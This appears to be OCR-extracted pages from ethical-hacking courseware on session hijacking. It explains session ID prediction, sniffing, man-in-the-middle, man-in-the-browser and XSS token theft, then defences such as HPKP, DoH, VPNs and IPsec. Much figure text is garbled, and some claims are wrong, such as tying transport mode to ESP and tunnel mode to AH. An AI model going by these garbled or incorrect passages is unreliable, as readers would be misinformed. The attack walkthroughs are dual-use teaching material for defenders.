
Server Figure 11.7: Brute-forcing attack on the session ID of a user

As shown in the above figure, a legitimate user connects to a server with session ID VW30422101522507. Employing various combinations such as VW30422101518909 and VW30422101520803, an attacker attempts to brute force the session ID in the hope of eventually arriving at the correct session ID. Once the attacker obtains the correct session ID, they gain complete access to the user’s data and can perform operations on behalf of the legitimate user. Note: A session ID brute-forcing attack is known as a predicted range of values for a session ID is very small.

Module 11 Page 1527

session prediction attack if the

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

A session token can be compromised in various ways: =

Session sniffing

=

Session replay attack

=

Predictable session token

=

Session fixation attack

=

Man-in-the-middle (MITM) attack

=

CRIME attack

=

Man-in-the-browser attack

=

Forbidden attack

=

Cross-site scripting (XSS) attack

=

Session donation attack

=

Cross-site request forgery attack

=

PetitPotam hijacking

Module 11 Page 1528

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Compromising Session IDs using Sniffing and by Predicting Session Token

cE H mle sae

Compromising Session IDs using Sniffing

Compromising Session IDs by Predicting Session Token

@ An attacker uses a sniffer to capture a valid session token or session ID

@ Attackers can predict session IDs generated by weak algorithms and impersonate a website user

‘The attacker then uses the valid token session to

{@ Attackers analyze variable sections of session IDs to

gain unauthorized access to the web server

determine a pattern

Session ID ‘=ACF303SF216AAEFC

@ The analysis is performed manually or using various cryptanalytic tools ©@

Attackers collect a high number of simultaneous

session IDs to gather samples in the same time window and keep the variable constant

‘Attacker

Compromising Session IDs Using Sniffing A web

server

identifies a user’s connection

through

a unique

session

ID (also known

as a

session token). The web server sends a session token to the client browser after the successful authentication of client login. Usually, a session token comprises a string of variable width that is useful in various ways, such as in the header of an HTTP requisition (cookie), in a URL, or in the body of an HTTP requisition. An attacker uses packet sniffing tools such as Wireshark and Riverbed Packet Analyzer Plus to intercept the HTTP traffic between a victim and web server. The attacker then analyzes the data in the captured packets to identify valuable information such as session IDs and passwords. Once the session ID is determined, the attacker masquerades as the victim and sends the

session ID to the web server before the victim does. The attacker uses the valid token session to gain unauthorized access to the web server. In this manner, the attacker takes control over an existing legitimate session. Session ID =ACF303SF216AAEFC

Victim

Attacker sniffs £ a legitimate ©

7

Web Server

Figure 11.8: Prediction of session ID by sniffing

Module 11 Page 1529

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Compromising Session IDs by Predicting Session Token Asession ID is tagged as proof of an authenticated session established between a user and web server. Thus, if an attacker can guess or predict the session ID of the user, fraudulent activity is possible. Session prediction enables an attacker to bypass the authentication schema of an application. Usually, attackers can predict session IDs generated by weak algorithms and impersonate a website user. Attackers analyze a variable section of session IDs to determine the existence of a pattern. This analysis is performed either manually or by using various cryptanalytic tools. An attacker collect a high number of simultaneous session IDs to gather samples in the same time window and keep the variable constant. First, the attacker collects some valid session IDs that are useful in identifying authenticated users. The attacker then studies the session ID structure, the information used to generate it, and the algorithm used by the web application to secure it. From these findings, the attacker can predict the session ID. Attackers can also guess session IDs by using a brute-force technique, in which they generate and test different session ID values until they succeed in gaining access to the application.

Module 11 Page 1530

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

How to Predict a Session Token ‘|@

Most web servers use custom algorithms or a predefined pattern to generate session IDs

‘@

Anattacker guesses the unique session value or deduces the session ID to hijack the session

Captures

http://www. http://www. http://www. http://www.

An attacker captures several session IDs and analyzes the

pattern

certifiedhacker. certifiedhacker. certifiedhacker. certifiedhacker.

com/view/JBEX12042022152820 com/view/JBEX12042022153020 com/view/JBEX12042022160020 com/view/JBEX12042022164020

Constant

Date

Time

Predicts At 16:25:55 on April 14, 2022,

the attacker can successfully predict the session ID

|

http://www. certifiedhacker. com/view/JBEX14042022162555,

Constant

Date

Time

How to Predict a Session Token Most web servers generate session IDs using custom algorithms or a pre-defined pattern that might simply increase static numbers, whereas others use more complex procedures such as factoring in time and other computer-specific variables. Thus, attackers can identify session IDs generated in the following ways: =

Embedding in the URL, which is received by a GET request in the application when the links embedded within a page are clicked by clients

=

Embedding in a form as a hidden field, which is submitted to the HTTP’s POST command

=

Embedding in cookies on the client’s local machine

An attacker guesses the unique session value or deduces the session ID to hijack the session. As shown in the below figure, an attacker first captures several session IDs and analyzes the

pattern.

http: //www.certifiedhacker .com/view/JBEX12042022152820 http: //www.certifiedhacker .com/view/JBEX12042022153020 http: //www.certifiedhacker .com/view/JBEX12042022160020 http: //www.certifiedhacker .com/view/JBEX12042022164020 Constant

Date

Time

Figure 11.9: Sample sessions captured by an attacker

Module 11 Page 1531

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

On analyzing the pattern, at 16:25:55 on April 14, 2022, the attacker successfully predicts the session ID, as shown in the below figure. http: //www.certifiedhacker

.com/view/JBEX14042022162555 Constant

Date

Time

Figure 11.10: Session ID predicted by the attacker

Now, the attacker can mount an attack through the following steps. =

The attacker acquires the current session ID and connects to the web application.

=

The attacker implements a brute-force technique or calculates the next session ID.

=

The attacker modifies the current assumes the next user’s identity.

Module 11 Page 1532

value

in the

cookie/URL/hidden

form

field

and

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Compromising Session IDs Using Man-in-the-Middle/ Manipulator-in-the-Middle Attack ‘@

C IE H bod bral

The man-in-the-middle/manipulator-in-the-middle attack is used to intrude into an existing connection between systems and intercept the messages being exchanged

@ Attackers use different techniques and split the TCP connection into two connections:

@ Client-to-attacker connection @ Attacker-to-server connection

@ After the interception of the TCP connection, an attacker can read, modify, and insert fraudulent

data into the intercepted communication ‘@

In the case of an http transaction, the TCP connection between the client and the server

becomes the target

Compromising

Middle Attack

Session

IDs

Using

Man-in-the-Middle/Manipulator-in-the-

A man-in-the-middle/manipulator-in-the-middle (MITM) attack is used to intrude into an existing connection between systems and to intercept messages being transmitted. In this attack, attackers use different techniques and split a TCP connection into two: a client-toattacker connection and an attacker-to-server connection. After the successful interception of a TCP connection, an attacker can read, modify, and insert fraudulent data into the intercepted communication. In the case of an HTTP transaction, the TCP connection between the client and server is the target. Victim

¢ MITM Connection

Web Server

MITM

Connectior

Figure 11.11: Prediction of session ID using a man-in-the-middle (MITM) attack

Module 11 Page 1533

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Compromising Session IDs Using Man-in-the-Browser /Manipulator-in-the-Browser Attack

C IE H .

‘@

The man-in-the-browser/manipulator-in-thebrowser attack uses a Trojan horse to intercept the calls between the browser and its security mechanisms or libraries

‘@

It works with an already installed Trojan horse and acts between the browser and its security mechanisms

‘@

Its main objective is to cause financial deceptions by manipulating transactions of Internet banking systems

ml,

Steps to Perform Man-in-the-Browser Attack The Trojan first infects the computer's software (OS or application)

CE H

When the user clicks on the button, the extension uses DOM interface and extracts all the data from all form fields and modifies the values

The Trojan installs malicious code (extension files) and saves it into the

9 | ‘The browsersends the form and modified values to the server

After the user restarts the browser, the malicious code in the form of extension files is loaded

‘The server receives the modified values but cannot distinguish between the original and the modified values

browser configuration

The extension files register a handler for every visit to the webpage

| 11 | After the server performs the transaction, a receipt is generated

‘When is loaded, the extension uses the URL and matches it with a the list ofpageknown sites targeted for attack

| 12 | Now, the browser receives the receipt for the modified transaction

The user logs in securelyto the website

| 13 | The browser displays the receipt with the original details

The Trojan registers a button event handler when a specific page load is detected fora specific pattern and compares it with its targeted list

‘The user thinks that the original transaction was received by the server without any interceptions Al RightsReserved Reproduction i Strictly Prohibited

Compromising

Browser Attack

Session

IDs

Using

Man-in-the-Browser/Manipulator-in-the-

A man-in-the-browser/manipulator-in-the- browser attack is similar to an MITM attack. The difference between the two is that a man-in-the-browser attack uses a Trojan horse to intercept and manipulate calls between a browser and its security mechanisms or libraries. An attacker positions a previously installed Trojan between the browser and its security

Module 11 Page 1534

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

mechanism, and the Trojan can modify web pages and transaction content or insert additional transactions. All of the Trojan’s activities are invisible to both the user and web application. The main objective of this attack is financial theft by manipulating transactions made using Internet banking systems. A man-in-the-browser attack can succeed even in the presence of security mechanisms such as SSL, public key infrastructure (PKI), and two-factor authentication because all the expected controls and security mechanisms would seem to function normally. Steps to Perform Man-in-the-Browser Attack:

=

The Trojan first infects the computer’s software (OS or application).

=

The Trojan installs malicious code (extension files) and saves it in the browser configuration.

=

After the user restarts the browser, the malicious code in the form of extension files is loaded.

=

The extension files register a handler for every visit to a webpage.

=

When a page is loaded, the extension matches its URL with a list of known sites targeted for attack.

=

The user logs in securely to the website.

=

The extension registers a button event handler when a specific page load is detected with a specific pattern and compares it with its targeted list.

=

When the user clicks on the button, the extension uses the Document Object Model (DOM) interface and extracts all the data from all form fields and modifies the values.

=

The browser sends the form and modified values to the server.

=

The server receives the modified values but cannot distinguish between the original and modified values.

=

After the server performs the transaction, a receipt is generated.

=

Now, the browser receives the receipt for the modified transaction.

=

The browser displays the receipt with the original details.

=

The user believes that the original transaction was received by the server without any interception.

Module 11 Page 1535

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Compromising Session IDs Using Client-side Attacks Cross-Site Scripting (XSS) @ XSS enables attackers to inject malicious client-side scripts into the web pages viewed by other users

CE H

Client

Malicious JavaScript Codes @ Amialicious script can be embedded in a web page that does not generate any warning, but it captures session tokens in the

background and sends them to the attacker Trojans

@ A Trojan horse can change the proxy settings in the user’s browser to send all the sessions through the attacker’s machine

Malidous Server

Compromising Session IDs Using Client-side Attacks Client-side attacks target vulnerabilities in client applications that interact with a malicious server or process malicious data. Depending on the nature of vulnerabilities, an attacker can exploit an application by sending an email with a malicious link or otherwise tricking a user into visiting a malicious website. Vulnerable client-side applications include unprotected websites, Java Runtime Environment, and browsers; of these, browsers are the major target. Client-side attacks occur when clients establish connections with malicious servers and process potentially harmful data from them. If no interaction occurs between the client and server, then there is no scope for a client-side attack. One such example is running a File Transfer Protocol (FTP) client without establishing a connection to an FTP server. In the case of instant messaging, the application is configured in such a way that it makes clients to log in to a remote server, making it susceptible to client-side attacks. The following client-side attacks can be used to compromise session IDs. =

Cross-site scripting (XSS): XSS enables attackers to inject malicious

=

Malicious JavaScript codes: An attacker can embed in a web page a malicious script that does not generate any warning but captures session tokens in the background and

into web pages viewed by other users.

client-side scripts

sends them to the attacker. =

Trojans: A Trojan horse can change the proxy settings in the user’s browser to send all sessions through an attacker’s machine.

Module 11 Page 1536

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Session Hijacking

Malicious Server

Response

Attack

Request

Gi

Client

Server

Figure 11.12: Prediction of session ID using a client-side attack

Module 11 Page 1537

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack

cE H Ped othe

@ If an attacker sends a crafted link to the victim with malicious JavaScript, the JavaScript will run and complete the instructions made by the attacker when the victim clicks on the link

User User clicks on link; the malicious JavaScript run:

JSESSIONID=8FEBOASSF1E3E ‘898E342E07ADA127144,

Establishes session

z http: //janaina:8080

e

‘Attacker sends malicious link with malicious JavaScript crafted i

structions made by the attacker and confirms the session identifier, thus attacker steals the session identifier

Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack A cross-site script attack is a client-side attack in which the attacker compromises a session token by using malicious code or programs. This type of attack occurs when a dynamic web page receives malicious data from the attacker and executes it on the user’s system. Web sites that create dynamic pages do not have control over how the clients read their output. Thus, attackers can insert a malicious JavaScript, VBScript, Activex, Hypertext Markup Language (HTML), or Flash applet into a vulnerable dynamic page. That page then executes the script

on

the

user’s

machine

and

collects

personal

information

of the

user,

steals

cookies,

redirects users to unexpected web pages, or executes any malicious code on the user’s system. As shown in the below figure, a user first establishes a valid session with a server. An attacker sends a crafted link to the victim with malicious JavaScript. When the user clicks on the link, the JavaScript runs automatically and performs the instructions set by the attacker. The result displays the current session ID of the user. Using the same technique, the attacker can create specific JavaScript code that fetches the user’s session ID:

Thereafter, the attacker uses the stolen session ID to establish a valid session with the server.

Module 11 Page 1538

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

= Al

P|

User User clicks on that

3 e

Tink; the malicious

JavaScript runs.


3% Invalid Public Key

Wob

Server

Figure 11.38: Implementation of HPKP

Module 11 Page 1587

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

=

Exam 312-50 Certified Ethical Hacker

HTTP Referrer Header When a user visits a web page, the browser will set a referrer header. It contains the URL or URI of the web page, which can be used to navigate to the target web page along with the IP address and session ID. Fingerprinting the referrer header of each request will help in identifying the changes in the HTTP headers. When the attacker tries to hijack the session using a valid session ID, the HTTP header differs. Consequently, the intrusion gets detected and the session is terminated. (1)

Browser sets the Referrer header

Tet

VY Valid header

Client

a 2 aneeee Seneca

Web Server

Figure 11.39: Implementation of HTTP referrer header

Module 11 Page 1588

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Approaches to Prevent MITM Attacks DNS over HTTPS

|

CE H

|G DNS over HTTPS (DoH) is an enhanced version of DNS protocol, which is used to prevent snooping of user’s web activities or DNS queries during the DNS lookup process

(@

The web queries and traffic are sent through encrypted HTTPS via port 443

2

mae

Port hai!

Secure tunnel

443 Port

taf vinmsninoenres

ie =

.

Conventional DNS queries

53



4

DNS Resolver DNS Client

Attacker

Approaches to Prevent MITM Attacks (Cont’d) WEP/WPA. Encryption

VPN

CE H

©

WEP and WPAare different wireless protocols that are intended to protect the traffic that is sent and received by users over a wireless network | | @ The implementation of these protocols can thwart unwanted users connecting to the network and prevent MITM attacks

|

© AVPN creates a safe andencrypted tunnel over a public network to securely send and receive sensitive information @

The implementation of VPN in the network prevents attackers from decrypting the data flowing between the

@

A two-factor authentication provides an extra layerof protection as it provides another vectorof authentication in addition

endpoints

awe password ‘Two-Factor | Authentication © The implementation of two-factor authentication can prevent attackers from performing session hijacking and brute-forcing their way into a user account

Password Manager

Zero-trust

Principles

|

|

© Password manager is an application/tool used to protect andmanage individual credentials Using a password manager, passwords are stored in a secure location and encapsulated using a master key to prevent MITM. attacks © Zero-trust principles are a set of standardized user pre-verification procedures that requires all users (inside or outside) to be authenticated before providing access to any resources

© These principles work based on the famous phrase, “Trust but verify”

Approaches to Prevent MITM Attacks Man-in-the-middle (MITM) attacks are the most common type of attack, wherein the attackers intercept the traffic between two endpoints. The victim may not realize the effect of this attack, because it is mostly passive in nature. Because the detection of MITM attacks is difficult, they can only be prevented using various measures.

Module 11 Page 1589

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

The following are some approaches to prevent MITM attacks: =

DNS over HTTPS

DNS over HTTPS (DoH) is an enhanced version of the DNS protocol that is used to prevent the peeking or snooping of user’s web activities or DNS queries during the DNS lookup process. The protocol is different than the conventional DNS protocol since the web queries and the traffic is sent through a secured or encrypted HTTPS tunnel via port 443. Implementing DNS over HTTPS makes the traffic undetectable by the attackers or ISPs since it gets hidden within the normal traffic passing through the HTTPS port. Unlike the traditional DNS lookup process, the DoH sends a segment of a necessary domain name to fetch the results instead of sending the complete domain name entered by a user. This protocol helps in ensuring user’s privacy and security as the web traffic is directed only between DoH supported clients and a resolver avoiding MITM and session hijacking attacks. Web browsers such as Chrome, Mozilla, and Microsoft Edge have been implementing this protocol for the past few years and Mozilla had already adopted this protocol as default from 2020 for its US clients.

Secure tunnel

DNS Resolver DNS Client ‘Attacker Figure 11.40: DNS over HTTPS

=

WEP/WPA Encryption Wired Equivalent Privacy (WEP) and Wireless Protected Access (WPA) are wireless protocols that are intended to protect the traffic that is sent and received by users over a wireless network. The implementation of these protocols can thwart the attempts of unwanted users to connect to the network. A weak encryption mechanism enables attackers to brute force credentials and enter the target network to perform an MITM attack.

=

VPN

A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information. It creates a subnet by using key-based encryption for secure communication between endpoints. The implementation of a VPN in the network prevents attackers from decrypting the data flowing between the endpoints.

Module 11 Page 1590

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking =

Exam 312-50 Certified Ethical Hacker

Two-Factor Authentication Two-factor authentication provides an extra layer of protection because it serves as a vector of authentication in addition to a user’s password. Therefore, the implementation of two-factor authentication can prevent attackers from performing session hijacking and brute forcing to compromise a user’s account.

=

Password Manager Password Manager is an application or tool used to protect and credentials. The tool can also help in producing unique and complex applications. Using the password manager, passwords can be stored under the database and encapsulated using a master key to prevent

=

manage individual passwords for web in a secure location MITM attacks.

Zero-trust Principles Zero-trust principles constitute a set of standardized user pre-verification procedures that requires all users (inside or outside) to be authenticated before providing access to any resource. These principles are based on the famous phrase, “Trust but verify.” Even though the request is made from the internal network, the authentication process is similar to that for an outsider.

Module 11 Page 1591

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

IPsec

CE H

‘@

|Psec is a protocol suite developed by the IETF for securing IP communications by authenticating and

‘@

Itis deployed widely to implement VPNs and for remote user access through dial-up connection to private

encrypting each IP packet of a communication session

networks

Components of IPsec @

Benefits of IPsec

IPsec Driver

© @

Internet Key Exchange (IKE) Internet Security Association Key Management Protocol © Oakley @

IPsec Policy Agent —

©

Network-level peer authentication

© ©

Data origin authentication Data integrity

@

Data confidentiality (encryption)

©

Replay protection

ed

L

4

IPsec (Cont’d) Modes of IPsec

Transport Mode

Internet

a

=

—_Transport-mode encapsulation | sce | Wansporedata [irsector header | header | (rc, uor,etc) | (ESPonh)

Tunnel Mode —_Tunnel—mode encapsulation

=

ESP Protocol

ey



Encryption Algorithm

| |

IPsec Internet Protocol Security (IPsec) is a set of protocols that the Internet Engineering Task Force IETF) developed to support the secure exchange of packets at the IP layer. It ensures interoperable cryptographically based security for IPv4 and IPv6, and it supports network-level peer authentication, data origin authentication, data integrity, data confidentiality (encryption), and replay protection. It is widely used to implement VPNs and for remote user access through

Module 11 Page 1592

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

dial-up connection to private networks. It supports transport and tunnel encryption although sending and receiving devices must share a public key.

modes,

IPsec policies can be assigned through the Group Policy configuration of Active Directory domains, organizational units, and IPsec deployment policies at the domain, site, or organizational-unit level. The security services offered by IPsec include the following: =

Rejection of replayed packets (a form of partial sequence integrity)

=

Data confidentiality (encryption)

=

Access control

=

Connectionless integrity

=

Data origin authentication

=

Data integrity

=

Limited traffic-flow confidentiality

=

Network-level peer authentication

=

Replay protection

At the IP layer, IPsec provides all the above-mentioned services, offering the protection of IP and/or upper-layer protocols such as TCP, UDP, ICMP, and Border Gateway Protocol (BGP). Components of IPsec

=

IPsec driver: Software that performs protocol-level functions required to encrypt and decrypt packets.

=

Internet Key Exchange (IKE): An protocol that produces security keys for IPsec and other protocols.

=

Internet Security Association and Key Management Protocol (ISAKMP): Software that allows two computers to communicate by encrypting the data exchanged between them.

=

Oakley: A protocol that uses the Diffie-Hellman algorithm to create a master key and a key that is specific to each session in IPsec data transfer.

=

IPsec Policy Agent: A service included in Windows OS that enforces IPsec policies for all the network communications initiated from that system.

The following are the steps involved in the IPsec process.

=

Aconsumer sends a message to a service provider.

=

The consumer's IPsec driver attempts to match the outgoing packet's address or the packet type against the IP filter.

=

The IPsec provider.

=

The service provider's ISAKMP receives the security negotiation request.

Module 11 Page 1593

driver

notifies

ISAKMP

to initiate

security

negotiations

with

the

service

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

=

Both principles initiate a key exchange, establishing an ISAKMP Security Association (SA) and a shared secret key.

=

Both principles discuss the security level for the information exchange, establishing both IPsec SAs and keys.

=

The consumer's IPsec driver transfers packets to the appropriate connection type for transmission to the service provider.

=

The provider receives the packets and transfers them to the IPsec driver.

=

The provider's IPsec uses the inbound SA and begin decryption.

key to check the digital signature and

=

The provider's IPsec driver transfers decrypted further processing.

packets to the OSI transport layer for

Modes of IPsec The configuration of IPsec involves two different modes: the tunnel mode and transport mode. These modes are associated with the functions of two core protocols: the Encapsulation Security Payload (ESP) and Authentication Header (AH). The model selection depends on the requirements and implementation of IPsec.

=

Transport Mode In the transport mode (also ESP), IPsec encrypts only the payload of the IP packet, leaving the header untouched. It authenticates two connected computers and provides the option of encrypting data transfer. It is compatible with network address translation (NAT); therefore, it can be used to provide VPN services for networks utilizing NAT. id

a

Internet

c

*,

*

:

Transport — mode encapsulation

IP

header

IPsec

Transport data

| header

(TCP, UDP, etc.)

Figure 11.41: Transport mode encapsulation

=

Tunnel Mode In the tunnel mode (also AH), the IPsec encrypts both the payload and header. Hence, in the tunnel mode has higher security than the transport mode. After receiving the data, the IPsec-compliant device performs decryption. The tunnel model is used to create

Module 11 Page 1594

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

VPNs over the Internet for network-to-network communication (e.g., between routers and link sites), host-to-network communication (e.g., remote user access), and host-tohost communication (e.g., private chat). It is compatible with NAT and supports NAT traversal.

In the tunnel mode, the system encrypts entire IP packets (payload and IP header) and encapsulates the encrypted packets into a new IP packet with a new header. In this mode, ESP encrypts and optionally authenticates entire inner IP packets, whereas AH authenticates entire inner IP packets and selected fields of outer IP headers. The tunnel mode is usually useful between two gateways or between a host and gateway. etnies

authenticated

>

Figure 11.42: Tunnel mode encapsulation

IPsec Architecture IPsec offers security services at the network layer. This provides the freedom to select the required security protocols as well as the algorithms used for services. To provide the requested services, the corresponding cryptographic keys can be employed, if required. Security services offered by IPsec include access control, data origin authentication, connectionless integrity, anti-replay, and confidentiality. To meet these objectives, IPsec uses two traffic security protocols, AH and ESP, as well as cryptographic key management protocols and procedures. The protocol structure of the IPsec architecture is as follows.

Authentication Header (AH): optional anti-replay features.

It offers integrity and

data

origin

authentication,

with

Encapsulating Security Payload (ESP): It offers all the services offered by AH as well as confidentiality. IPsec Domain of Interpretation (DOI): It defines the payload formats, types of exchange, and naming conventions for security information such as cryptographic algorithms or security policies. IPsec DOI instantiates ISAKMP for use with IP when IP uses ISAKMP to negotiate security associations.

Module 11 Page 1595

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking =

Internet protocol

Exam 312-50 Certified Ethical Hacker

Security Association and in the IPsec architecture

communications over communications, by

Key Management Protocol (ISAKMP): It is a key that establishes the required security for various

the Internet, such as government, combining the security concepts

private, and commercial of authentication, key

management, and security associations.

=

Policy: IPsec policies are useful in providing network security. They define when and how to secure data, as well as security methods to use at different levels in the network. One can configure IPsec policies to meet the security requirements of a system, domain, site, organizational unit, and so on. IPsec Architecture

Vv

[

(te ee eeeeeeeeeeeeeeeenas

Cee

AH Protocol

ESP Protocol

vv

.

Authentication

Vv

.

.

Encryption Algorithm

Algorithm

IPsec Domain of seneccaronees>>y

Policy

}of

Interpretation

(DO!

Key Management

]

A Figure 11.43: IPsec architecture

Module 11 Page 1596

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

CEH

IPsec Authentication and Confidentiality ‘@

IPsec uses two different

security services for authentication and

confidentiality ® Authentication Header (AH): Providesthe data authentication of the sender @ Encapsulation Security Payload (ESP): Provides both the data authentication and encryption (confidentiality)of the sender

Fle Action View Help ¢9%\/26/63\/En Bh Seeutty Settings

Be

‘Name Description Policy signed 1P Security Policy Wierd Baiscree 7 Windows Defender Frenall ith Advanc} 1Security Policy Nome 5 Netoist Manager Policies Nae the P Seay poly and prove abe denen [Pub Key Policies Softwar Reston Plces

ast Mea x

oi Copyright © by

IPsec Authentication and Confidentiality IPsec uses two different security services for authentication and confidentiality. =

Authentication Header (AH): It is useful in providing connectionless integrity and data origin authentication for IP datagrams and anti-replay protection for the data payload and some portions of the IP header of each packet. However, it does not support data confidentiality (no encryption). A receiver can select the service to protect against replays, which is an optional service on establishing a security association (SA).

=

Encapsulation Security Payload (ESP): In addition to the services (data origin authentication, connectionless integrity, and anti-replay service) provided by AH, the ESP protocol offers confidentiality. Unlike AH, ESP does not provide integrity and authentication for the entire IP packet in the transport mode. ESP can be applied alone, in conjunction with AH, or in a nested manner. It protects only the IP data payload in the default setting. In the tunnel mode, it protects both the payload and IP header.

Module 11 Page 1597

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

File

Action

e9\a2nl

View

Exam 312-50 Certified Ethical Hacker

Help

SBibm|

|

ae

BB Security Settings

| | Name

> (1 Account Policies

> (1 Local Policies > 1) Windows Defender Firewall with Advanci

Network List Manager Policies Public Key Policies

Description

Policy Assigned

Last Mod

IP Security Policy Wizard

IP Securityhs Policy IP's Name

x

are provide a brief

> 15 Software Restriction Poli > (5) Application Control Poli

> [5] Advanced Audit Policy Configuration

< Back

Cancel

Figure 11.44: Screenshot of local IPsec policy on Windows

Module 11 Page 1598

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking

Exam 312-50 Certified Ethical Hacker

Session Hijacking Prevention Tools (XSAST is a unique source code analysis solution

CxSAST | that provides tools to identify, track, and repair technical and logical flaws in the source code

|

CE H

Fiddler is used for the security testing of web applications, such as Fiddler | decrypting HTTPS trafficand manipulating requests using a MITM decryption technique

Update SAST endpoints in database

a= j Session Hijacking Prevention Tools:

‘http://w checkmare.com

http://www telercom

© Nessus (https://www.tenable.com)

© Invicti (nteps://www.invct.com)

|

Session Hijacking Prevention Tools To prevent session hijacking, the security testing of web applications and the analysis of static code to identify vulnerabilities in web applications are required. Identifying vulnerabilities at an early stage helps in implementing security measures to protect against session hijacking attacks.

Module 11 Page 1599

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking =

Exam 312-50 Certified Ethical Hacker

CxSAST

Source: https://www.checkmarx.com Checkmarx CxSAST is a unique source-code analysis solution that provides tools for identifying, tracking, and repairing technical and logical flaws in source code, such as security vulnerabilities, compliance issues, and business logic problems. CxSAST supports open-source analysis (CxOSA), enabling licensing and compliance management, vulnerability alerts, policy enforcement, and reporting. This tool supports a wide range of OS platforms, programming languages, and frameworks.

Security professionals can use this tool to prevent various session hijacking attacks such as MITM attacks, session fixation attacks, and XSS attacks.

CH@CKMARX CxPostinstall 0.9.0

Update SAST endpoints in database Current state SAST Application URI

After update http://hostname.com

Server public origin

Identity Authority URI CxARM

http://hostname.com/CxRestAPI/auth

URI

Figure 11.45: Screenshot of CxSAST.

Module 11 Page 1600

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Session Hijacking =

Exam 312-50 Certified Ethical Hacker

Fiddler

Source: https://www.telerik.com Fiddler is used for performing web-application security tests such as the decryption of HTTPS traffic and manipulation of requests using an MITM decryption technique. Fiddler is a web debugging proxy that logs all HTTP(S) traffic between a computer and the Internet.

Security professionals can use Fiddler to test web applications by debugging the traffic from systems as well as manipulating and editing web sessions. © Telerik Fiddter Web Debugger

7

fie 588 Bier Took Yew Help EY cect

Cache FT TetWicard |B Tearff | MSON Search. Find [Ak Save lB CB Browse - GeCler |i Decode Keep: Alsesions > GB Any Process [BE Winconfig CD 7 Reply + b Go |WSiream Sil

:

Bo rms

demain

Se

Breen

y

Ot

CoE

eevee vtcrnyanaoen

Feed itcrreriat wesrare

Boney (Sesto

Online x

nesronse ees (ty Conent-Type) SIGCHI

oops me ters rs

neal

x

Bee esceeaaSSAKSTE

zi (Si |Ba

@ Composer

@

o

r

‘Show chart

eT

1/28 | seb. peiiomscton

